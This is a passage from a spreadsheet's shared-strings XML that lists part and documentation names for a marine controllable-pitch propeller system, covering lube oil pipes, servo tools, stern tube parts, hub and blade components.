    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - split sealing ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - thrust bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - filter/gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - filter/back pres valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - oil block/cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - oil block/thermostat</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - cooler/lub oil filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - cooler/gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - cooler/bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - cooler/thrust bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - cooler/oil block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - gearbox/bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - thermostat/cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - thermo-cooler/filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - b press valve/gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - gear wheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LO pipe - SW pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - oil pump/safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - safety valve/filter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - filter/safety valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - filter/oil block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - pump/gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe - oil block/servo</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch pipe - return from clutch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water pipe-cooler/engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cooling water pipe-engine/cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction pipe - internal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Suction pipe - external</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pipe - internal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pipe - external</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pipe with flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe section for lub oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil distribution pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket - lub oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe - internal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe - external</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe section for servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket - Servo oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange for clutch oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket - clutch oil pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure monitoring pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conical pipe section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic hose - low pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic hose - high pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for gear without engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test servo</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test servo - End cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test servo - Servo cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test servo - Servo piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test servo - Distance ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for mounting - servo</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Auxiliary tool mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Push-up cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lock washer for tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for emergency control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover for emergency control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spindle for emergency control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance ring - emergency contrl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emergency</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Transport arrangement - Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire strap - Transport of gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shackle - Transport of gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting tool mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shackle for lifting tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamp for shackle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disc for shackle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter for lifting tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Standard spare part supply</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Extended spare part supply</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Service kit additional</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing procedure - Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flushing equipment - Connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe for bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking pawl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch foundation mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clutch foundation complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for servo unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Declutch device mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cross-arm declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fork declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stop declutch device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneumatic Clutch Cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rod seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston slide ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rod slide ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Split sealing ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin - conical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin - cylindrical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Washer - hardened</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Banjo coupling with nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bulkhead connector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tacho pick-up mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket - tacho pick-up complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for tacho pick-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Holder for tacho pick-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil level sensor mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket oil level sensor compl</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for oil level sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Holder for oil level sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature sensor mounted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket - temp. sensor complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Holder for temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protection cap for temp sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End plate for protection cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle iron for protection cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction manual - gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Info number required</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller shaft specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller blade left</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller blade right</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Profile table</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nose profile</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Anti singing edge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade foot machining left</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade foot, remachining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade foot machining right</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate shaft specifikation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Combinator Curve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PD-n diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main hub dimension</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimension sketch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller types</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller layout data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shaft alignment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bearing alignment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alignment check</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alignment drawing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Operating restrictions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mass elastic data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tightening data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Epoxy mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Acceptance criteria</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe movement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propagation of chrome layer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Data request for nozzle design</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manganese phosphatising</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Recommended tightening torque</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Epoxy mounted stern tube</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller flushing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Replacement OD-ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coating specifications</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>General tightening instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fit/Tie bolt instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange connection layout data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ins. for use of flushing kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Maintenance programme</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plant specific data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitting of propeller in nozzle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bollard pull trials</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shop test</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test form prop intermed. shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection sheet - blade flang</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection sheet-pitch control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check list</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Check list VBS-ODS-AT2000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guidance test form</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection sheet servo unit X41</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GETO-Operating data Feedback</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller equipment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil system for stern tube and se</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Strut bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube basic parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adaptor flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Alignment ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure control pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube seal forward</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bulkhead seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Clamp ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crome steel liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube liner aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube liner forward</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rubber bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Keeper bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Retainer ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Net pick-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Net cutter</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange assembly ODS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange assembly ODG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange assembly CFM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange assembly CFH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ODL assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange nut, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lock ring, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sealing flange, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Feedback ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling muff, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling muff</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coupling flange two-parted</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil distributor ring blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throw off ring, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End cover, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seal for oil distributor ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gland</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stuffingbox housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Liners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lip ring cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Machining of coupling flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozzle screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring for coupling bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Locking bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Foundation for locking device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fixture</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bolt shank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOT bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOF/HOT tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jack hydraulic</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gravity tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller hub/shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve box assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller shaft flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ODG Box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller hub</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller hub, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub cylinder, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Baffle cone</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston rod, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protection anode</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston spacer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo cover, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo piston, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wear ring radial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wear ring axial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control head assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control head blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support rod blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch ctrl. head partly machined</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control head left</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control head right</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slide plate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide for pitch control head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide for PCH , blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade flange blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade flange left</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade flange right</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blade screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide blade screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slide block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Baseplate left</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Baseplate right</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stern tube seal aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water lub. stern tube seal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring anode</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Block anode</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Piston nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>End nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub servo pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hub repair</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wear plate inside</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spacer plate, bladefoot</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wear plate outside</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare collar mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare collar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Propeller shaft blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitted bush</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil pipe forward</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil flange, blank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pitch control rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Feedback flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
